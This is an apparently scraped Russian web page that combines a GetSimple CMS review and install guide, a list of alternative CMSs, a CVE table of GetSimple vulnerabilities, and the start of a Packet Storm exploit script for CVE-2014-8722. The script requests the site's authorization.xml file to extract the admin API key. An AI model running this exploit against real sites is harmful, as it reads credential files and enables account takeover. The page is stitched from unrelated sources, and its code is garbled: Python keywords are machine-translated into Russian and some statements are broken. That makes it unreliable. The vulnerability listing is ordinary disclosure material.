Cms getsimple: Самая простая CMS для малого бизнеса

GetSimple CMS — Without DB

Я начинаю описания CMS именно с этой системы, потому что она мне нравится больше остальных, она имеет удобный интерфейс, она действительно проста в использовании. Люди, желающие внести какие-либо дополнения в файлы системы или в файлы плагинов, смогут легко сориентироваться в коде и внести требуемые изменения. На форуме GetSimple CMS общаются люди со всего света и все они благодарят ее разработчиков. Там немало и разработчиков из России.

Готов новый сайт с описанием GetSimple CMS, есть форум

Также многие пробуют писать различные плагины (плагин — дополнение, расширяющее возможности). Не у всех получается, но постепенно GetSimple CMS обрастает различными качественными дополнениями как для обычных пользователей, так и для разработчиков.

Например, для пользователей уже созданы почти все возможные плагины — есть и галерея, и новости, и блог, и различные контактные формы, и возможность добавления комментариев на страницах, и плагин для создания опросов, и плагин гостевой книги.

Разработчики сайтов на GetSimple CMS смогут добавлять при помощи создания компонентов и других функций свои скрипты. Для них сделаны различные плагины. Exec-php плагин, который позволяет добавлять любой код прямо в текстовом редакторе. Четыре варианта меню: обычное меню, в дополнение к нему так называемое child-меню, двухуровневое и многоуровневое меню. Есть плагин RSS-загрузчик, позволяющий включать в код ссылки для загрузки различных RSS-лент. Есть плагин кэширования страниц. Есть возможность закрывать сайт на техобслуживание. Есть плагин для создания мультиязычных сайтов. Так же есть плагин массовой рассылки для подписавшихся пользователей  и еще несколько важных плагинов.

Ссылки на демо-версии и прочие есть в нижнем блоке.

Установка

  1. Скачиваем последнюю версию.
  2. Распаковываем содержимое архива в папку на вашем локальном компьютере.
  3. Может также потребоваться изменить права доступа к папке /data/ командой CHMOD 755.
  4. Закачать содержимое папки на FTP Вашего хостинга.
  5. Через браузер зайти по адресу вашего домена, куда вы загрузили GetSimple. Откроется страница установки.
  6. Все поля обязательны для заполнения. Закончив заполнение формы, вас попросят войти в систему с паролем, который сгенерируется автоматически и будет отправлен вам на почтовый ящик.
  7. После первого входа вы можете изменить пароль на любой другой удобный вам.

Видео

Показано два варианта установки, рекомендую пользоваться первым, потому что при изначальном выборе языка ломается кодировка, но после установки она меняется. Как видите установка занимает 50 секунд.

Выбор хостинга: я пользуюсь этим

Прежде чем купить хостинг для GetSimple CMS спросите провайдера все ли требуемые модули установлены.

  1. PHP версия 5.2.х
  2. cURL Module
  3. GD Library
  4. ZipArchive
  5. SimpleXML Module
  6. Apache Mod Rewrite

Мои сайты на GetSimple:

  • А вот и второй сайт на платном шаблоне
  • Мой сайт с предложением услуг по изготовлению сайтов на платных шаблонах
  • Сайт-визитка изготовленный на платном шаблоне
  • Еще один сайт с играми для мобильников
  • Каталог мужской одежды
  • Сайт с играми для мобильников
  • МФА-сайт переведен с DLE на GetSimple CMS
  • Мультиязычный сайт по продаже чаги
  • Сайт фотографа через год стал ей не нужен.
  • Сайт «Оптово-розничный магазин пушнины»
  • Сайт эротических игр

Ну и, конечно, этот сайт.

Аналоги GetSimple CMS — 5 похожих программ и сервисов для замены

Аналоги GetSimple CMS — 5 похожих программ и сервисов для замены

  • 1272

  • WordPress

    WordPress — это программное обеспечение с открытым исходным кодом, которое вы можете использовать для создания красивого веб-сайта, блога или приложения.

    • Условно бесплатная
    • Windows
    • Android
    • iPhone
    • Mac OS
    • Онлайн сервис

    WordPress — это программное обеспечение, разработанное для всех, предлагающее доступность, производительность, безопасность и простоту использования. Мы считаем, что отличное программное обеспечение должно работать с минимальными настройками, поэтому вы можете сосредоточиться на свободном распространении своей истории, продукта или услуг. Базовое программное обеспечение WordPress простое и предсказуемое, поэтому вы можете легко начать работу.

  • 136

  • Ghost

    Ghost — это платформа с открытым исходным кодом.

    • Платная
    • Windows
    • Mac OS

    Красиво оформленная платформа, посвященная одной вещи: издательскому делу. Ghost — это приложение с открытым исходным кодом, которое позволяет вам писать и публиковать свой собственный блог, предоставляя вам инструменты, делающие это легким и интересным занятием. Это просто, изящно и разработано так, чтобы вы могли тратить меньше времени на создание своего блога и больше времени на ведение блога.

  • 134

  • ProcessWire

    ProcessWire — это дружественная мощная CMS и CMF с открытым исходным кодом, имеющая исключительно прочную основу.

    • Бесплатная
    • Windows
    • Mac OS
    • Онлайн сервис

    ProcessWire — это дружественная мощная CMS и CMF с открытым исходным кодом, имеющая исключительно прочную основу. Со всеми настраиваемыми полями, простым в использовании API-интерфейсом в стиле jQuery и мощным механизмом выбора страниц ProcessWire подойдет для любой задачи.

  • 104

  • Boostlog

    Платформа блогов для программистов.

    • Бесплатная
    • Онлайн сервис

    Это платформа для программистов. Вы можете стать участником Boostlog с учетной записью GitHub и обсуждать с разработчиками Boostlog, выводя стек технологий.

  • 72

  • Grav

    Современная CMS с открытым исходным кодом.

    • Бесплатная
    • Windows
    • Онлайн сервис

    Grav — это простая в использовании, но мощная CMS с открытым исходным кодом, не требующая базы данных. Установка Grav — это просто распаковка архива. Он быстрый, имеет сложное кэширование и занимает мало места для оптимальной производительности.

Get-simple Getsimple Cms: список уязвимостей безопасности

Get-simple Getsimple Cms: список уязвимостей безопасности

(например: CVE-2009-1234 или 2010-1234 или 20101234)

Переключитесь на https://
Дом
Просмотр :
Поставщики
Товары
Уязвимости по дате
Уязвимости по типу
Отчеты:
Отчет о результатах CVSS
Распределение баллов CVSS
Поиск :
Поиск продавца
Поиск продукта
Поиск версии
Поиск уязвимостей
По ссылкам Microsoft
Топ 50 :
Поставщики
Оценки поставщика Cvss
Товары
Оценка Cvss продукта
Версии
Другое :
Бюллетени Майкрософт
Записи об ошибках
Определения CWE
О нас и контакты
Обратная связь
CVE-справка
Часто задаваемые вопросы
Статьи
Внешние ссылки:
Веб-сайт NVD
Веб-сайт CWE

Результаты копирования
Скачать результаты

Нажмите ESC, чтобы закрыть

# CVE-идентификатор Идентификатор CWE # эксплойтов Тип(ы) уязвимости Дата публикации Дата обновления Счет Получен уровень доступа Доступ Сложность Аутентификация конф. Интегр. Доступно.

1

CVE-2022-41544
Исполнительный код 18.10.2022 2022-10-19

0,0

Нет ??? ??? ??? ??? ??? ???
Было обнаружено, что GetSimple CMS v3.3.16 содержит уязвимость удаленного выполнения кода (RCE) через параметр edited_file в admin/theme-edit.php.

2

CVE-2022-1503 79
XSS 27.04.2022 05.05.2022

3,5

Нет Удаленный Средний ??? Нет Частично Нет
В GetSimple CMS обнаружена уязвимость, которую классифицировали как проблемную. Эта проблема затрагивает файл /admin/edit.php модуля содержимого. Манипулирование постконтентом аргумента с помощью ввода типа приводит к межсайтовому скриптингу. Атака может быть запущена удаленно, но требует аутентификации. Детали выставки были раскрыты в бюллетене.

3

CVE-2020-24861 79
XSS 2020-10-01 08.10.2020

3,5

Нет Удаленный Средний ??? Нет Частично Нет
GetSimple CMS 3.3.16 разрешает в параметре «постоянная ссылка» на странице настроек постоянный межсайтовый скриптинг, который выполняется при создании и открытии новой страницы

4

CVE-2020-23839 79
Исполнительный код XSS 2020-09-01 03. 12.2022

4.3

Нет Удаленный Средний Не требуется Нет Частично Нет
Уязвимость Reflected Cross-Site Scripting (XSS) в GetSimple CMS v3.3.16 на веб-странице портала входа в систему admin/index.php позволяет удаленным злоумышленникам выполнять код JavaScript в браузере клиента и собирать учетные данные для входа после того, как клиент щелкает ссылку. вводит учетные данные и отправляет форму входа.

5

CVE-2019-16333 79
XSS 15.09.2019 2019-09-19

3,5

Нет Удаленный Средний ??? Нет Частично Нет
GetSimple CMS v3. 3.15 имеет постоянный межсайтовый скриптинг (XSS) в admin/theme-edit.php.

6

CVE-2019-11231 22
Реж. Трав. Обход +Информация CSRF 22.05.2019 24.08.2020

5,0

Нет Удаленный Низкий Не требуется Частично Нет Нет
Проблема была обнаружена в GetSimple CMS до версии 3.3.15. недостаточная санация ввода в файле theme-edit.php позволяет загружать файлы с произвольным содержимым (например, PHP-код). Эта уязвимость активируется авторизованным пользователем; однако аутентификацию можно обойти. Согласно официальной документации для шага 10 установки, администратор должен загрузить все файлы, включая файлы .htaccess, и запустить проверку работоспособности. Однако упускается из виду то, что HTTP-сервер Apache по умолчанию больше не включает директиву AllowOverride, что приводит к раскрытию пароля data/users/admin. xml. Пароли хэшируются, но это можно обойти, начав с API-ключа data/other/authorization.xml. Это позволяет нацеливаться на состояние сеанса, поскольку они решили свернуть свою собственную реализацию. Cookie_name — это специально созданная информация, которая может быть украдена из внешнего интерфейса (имя и версия сайта). Если кто-то упустит ключ API и имя пользователя администратора, он сможет обойти аутентификацию. Для этого им необходимо предоставить файл cookie на основе вычисления SHA-1 этой известной информации. Уязвимость существует в файле admin/theme-edit.php. Этот файл проверяет отправку форм через POST-запросы и одноразовый номер csrf. Если отправленный одноразовый номер правильный, файл, предоставленный пользователем, загружается. Существует обход пути, разрешающий доступ для записи за пределами корня каталога тем в тюрьме. Использование обхода не требуется, поскольку файл .htaccess игнорируется. Способствующим фактором является то, что перед сохранением файла не выполняется еще одна проверка расширения, при условии, что содержимое параметра безопасно. Это позволяет создавать доступные через Интернет и исполняемые файлы с произвольным содержимым.

7

CVE-2018-19845 79
XSS 2018-12-31 25.02.2019

3,5

Нет Удаленный Средний ??? Нет Частично Нет
В GetSimple CMS 3.3.12 есть сохраненный XSS через параметр «post-menu» в admin/edit.php, проблема, связанная с CVE-2018-16325.

8

CVE-2018-19421 434
21.11.2018 28.12.2018

4,0

Нет Удаленный Низкий ??? Нет Частично Нет
В GetSimpleCMS 3. 3.15 admin/upload.php блокирует загрузку .html, но Internet Explorer отображает элементы HTML в файле .eml из-за admin/upload-uploadify.php и validate_safe_file в admin/inc/security_functions.php.

9

CVE-2018-19420 434
21.11.2018 28.12.2018

4,0

Нет Удаленный Низкий ??? Нет Частично Нет
В GetSimpleCMS 3.3.15 admin/upload.php блокирует загрузку .html, но есть несколько альтернативных случаев, в которых может выполняться HTML, например, файл без расширения или с нераспознанным расширением (например, имя файла test или test.asdf) , из-за admin/upload-uploadify.php и файла validate_safe_file в admin/inc/security_functions.php.

10

CVE-2018-17835 79
XSS 01. 10.2018 15.11.2018

3,5

Нет Удаленный Средний ??? Нет Частично Нет
Проблема была обнаружена в GetSimple CMS 3.3.15. Администратор может вставить сохраненный XSS с помощью параметра Custom Permalink Structure admin/settings.php, который внедряет полезную нагрузку XSS на любую страницу, созданную в URI admin/pages.php.

11

CVE-2018-17103 352
CSRF 2018-09-16 28.11.2018

6,8

Нет Удаленный Средний Не требуется Частично Частично Частично
** СПОРА ** Обнаружена проблема в GetSimple CMS v3. 3.13. Существует CSRF-уязвимость, которая может изменить пароль администратора через admin/settings.php. ПРИМЕЧАНИЕ. Поставщик сообщил, что PoC отправляет значение для параметра nonce.

12

CVE-2018-16325 79
XSS 01.09.2018 2018-11-02

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
В GetSimple CMS 3.4.0.9 есть XSS через поле заголовка admin/edit.php.

13

CVE-2018-15843 79
XSS 25.08.2018 17.10.2018

3,5

Нет Удаленный Средний ??? Нет Частично Нет
GetSimple CMS 3. 3.14 имеет XSS через поле «Добавить новую страницу» в admin/edit.php.

14

CVE-2018-9173 79
XSS 2018-04-022018-05-02

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
Уязвимость межсайтового скриптинга (XSS) в файле admin/template/js/uploadify/uploadify.swf в GetSimple CMS 3.3.13 позволяет удаленным злоумышленникам внедрить произвольный веб-скрипт или HTML, о чем свидетельствует параметр movieName.

15

CVE-2017-10673 79
XSS 29.06.2017 2019-12-12

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
admin/profile. php в GetSimple CMS 3.x имеет XSS в поле имени.

16

CVE-2015-5356 79
XSS 01.07.2015 2018-10-30

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
Уязвимость межсайтового скриптинга (XSS) в admin/filebrowser.php в GetSimple CMS до версии 3.3.6 позволяет удаленным злоумышленникам внедрить произвольный веб-скрипт или HTML через параметр func.

17

CVE-2015-5355 79
XSS 01.07.2015 2018-10-30

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
Множественные уязвимости межсайтового скриптинга (XSS) в GetSimple CMS до версии 3. 3.6 позволяют удаленным злоумышленникам внедрить произвольный веб-скрипт или HTML через (1) параметр post-content или (2) post-title в admin/edit.php.

18

CVE-2014-8790
20.01.2015 2018-10-30

5,0

Нет Удаленный Низкий Не требуется Частично Нет Нет
Уязвимость внешней сущности XML (XXE) в admin/api.php в GetSimple CMS 3.1.1–3.3.x до 3.3.5 Beta 1 в определенных конфигурациях позволяет удаленным злоумышленникам читать произвольные файлы с помощью параметра данных.

19

CVE-2014-8723 200
+Инфо 17.03.2017 20.03.2017

5,0

Нет Удаленный Низкий Не требуется Частично Нет Нет
GetSimple CMS 3. 3.4 позволяет удаленным злоумышленникам получать конфиденциальную информацию посредством прямого запроса к (1) plugins/anonymous_data.php или (2) plugins/InnovationPlugin.php, который раскрывает путь установки в сообщении об ошибке.

20

CVE-2014-8722 200
+Инфо 2017-03-17 2021-06-02

5,0

Нет Удаленный Низкий Не требуется Частично Нет Нет
GetSimple CMS 3.3.4 позволяет удаленным злоумышленникам получать конфиденциальную информацию посредством прямого запроса к (1) data/users/.xml, (2) backups/users/.xml.bak, (3) data/ другое/авторизация.xml или (4) data/other/appid.xml.

21

CVE-2014-1603 79
XSS 14. 05.2014 2018-10-30

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
Множественные уязвимости межсайтового скриптинга (XSS) в GetSimple CMS 3.3.1 позволяют удаленным злоумышленникам внедрить произвольный веб-скрипт или HTML через (1) параметр param в admin/load.php или (2) пользователя, (3) адрес электронной почты или (4) параметр имени в действии «Сохранить настройки» в admin/settings.php.

22

CVE-2013-7243 79
XSS 17.01.2014 2018-10-30

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
Множественные уязвимости межсайтового скриптинга (XSS) в GetSimple CMS 3. 1.2 и 3.2.3 позволяют удаленным злоумышленникам внедрить произвольный веб-скрипт или HTML через (1) поле пост-меню в edit.php или (2) поле отображаемого имени в настройки.php. ПРИМЕЧАНИЕ. Поля «Пользовательская структура постоянных ссылок» и «Адрес электронной почты» уже включены в CVE-2012-6621.

23

CVE-2013-1420 79
XSS 2020-01-02 13.01.2020

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
Множественные уязвимости межсайтового скриптинга (XSS) в GetSimple CMS до версии 3.2.1 позволяют удаленным злоумышленникам внедрить произвольный веб-скрипт или HTML через (1) параметр id в backup-edit.php; (2) заголовок или (3) параметр меню в edit.php; или (4) путь или (5) параметр returnid к filebrowser. php в admin/. ПРИМЕЧАНИЕ. Параметр пути в векторе admin/upload.php уже защищен CVE-2012-6621.

24

CVE-2012-6621 79
1
XSS 2014-01-16 2018-10-30

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
Множественные уязвимости межсайтового скриптинга (XSS) в GetSimple CMS 3.1, 3.1.2, 3.2.3 и более ранних версиях позволяют удаленным злоумышленникам внедрить произвольный веб-скрипт или HTML через (1) адрес электронной почты или (2) поля пользовательской структуры постоянных ссылок в админ/настройки.php; (3) параметр пути к admin/upload.php; (4) параметр ошибки в admin/theme.php; (5) параметр ошибки в admin/pages.php; или (6) успех или (7) параметр ошибки в admin/index. php.

25

CVE-2010-5052 79
XSS 23.11.2011 2018-10-30

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
Уязвимость межсайтового скриптинга (XSS) в admin/components.php в GetSimple CMS 2.01 позволяет удаленным злоумышленникам внедрить произвольный веб-скрипт или HTML через параметр val[].

26

CVE-2010-4863 79
1
XSS 05.10.2011 2018-10-30

4,3

Нет Удаленный Средний Не требуется Нет Частично Нет
Уязвимость межсайтового скриптинга (XSS) в admin/changedata. php в GetSimple CMS 2.01 позволяет удаленным злоумышленникам внедрить произвольный веб-скрипт или HTML через параметр post-title.

Общее количество уязвимостей: 26
Страница :
1
(Эта страница)

CVE является зарегистрированным товарным знаком корпорации MITRE, а официальным источником содержания CVE является
CVE-сайт MITRE.
CWE является зарегистрированным товарным знаком корпорации MITRE, а официальным источником контента CWE является
Веб-сайт CWE MITRE.
OVAL является зарегистрированным товарным знаком The MITRE Corporation, а официальным источником контента OVAL является
Веб-сайт MITRE OVAL.

Использование этой информации означает согласие на использование в состоянии КАК ЕСТЬ.
НИКАКИХ гарантий, подразумеваемых или иных, в отношении этой информации или ее использования.
Любое использование этой информации осуществляется на риск пользователя.
Пользователь несет ответственность за оценку точности, полноты или полезности любой информации, мнения, совета или другого контента.
КАЖДЫЙ ПОЛЬЗОВАТЕЛЬ НЕСЕТ ЕДИНСТВЕННУЮ ОТВЕТСТВЕННОСТЬ ЗА ЛЮБЫЕ последствия его или ее прямого или косвенного использования данного веб-сайта.
ОТ ВСЕХ ГАРАНТИЙ ЛЮБОГО РОДА ЯВНО ОТКАЗЫВАЕТСЯ. Этот сайт НЕ НЕСЕТ ОТВЕТСТВЕННОСТИ ЗА ЛЮБЫЕ ПРЯМЫЕ,
КОСВЕННЫЕ или любые другие потери.

GetSimple CMS 3.3.4 Раскрытие информации ≈ Packet Storm

Change Mirror Download

 # Название эксплойта: GetSimple CMS 3.3.4 - Раскрытие информации 
# Дата 01.06.2021
# Автор эксплойта: Ron Jost (Hacker5preme)
Домашняя страница: http://get-simple.info/
# Ссылка на программное обеспечение: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
# Версия: 3.3.4
# CVE : CVE-2014-8722
# Документация: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit

'''
Описание:
GetSimple CMS 3.3.4 позволяет удаленным злоумышленникам получать конфиденциальную информацию посредством прямого запроса к
(1) data/users/. xml,
(2) backups/users/ .xml.bak,
(3) data/other/authorization.xml или
(4) data/other/appid.xml.
'''

'''
Импорт необходимых модулей:
'''
import sys
импорт запросов

'''
Пользовательский ввод:
'''
target_ip = sys.argv[1] _port
sys.argv[2]
cmspath = sys.argv[3]
print('')
username = input("Вы знаете имя пользователя? Y/N:")
if username == 'Y':
print('')
username = True
username_string = input('Пожалуйста, введите имя пользователя: ')
else:
print('')
username = False
print('Нет проблем, вы все равно получите ключ API')

'''
Получить ключ API:
'''
url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
header = {
"User-Agent": «Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0»,
«Принять»: «text/html,application/xhtml+xml,application/xml;q=0.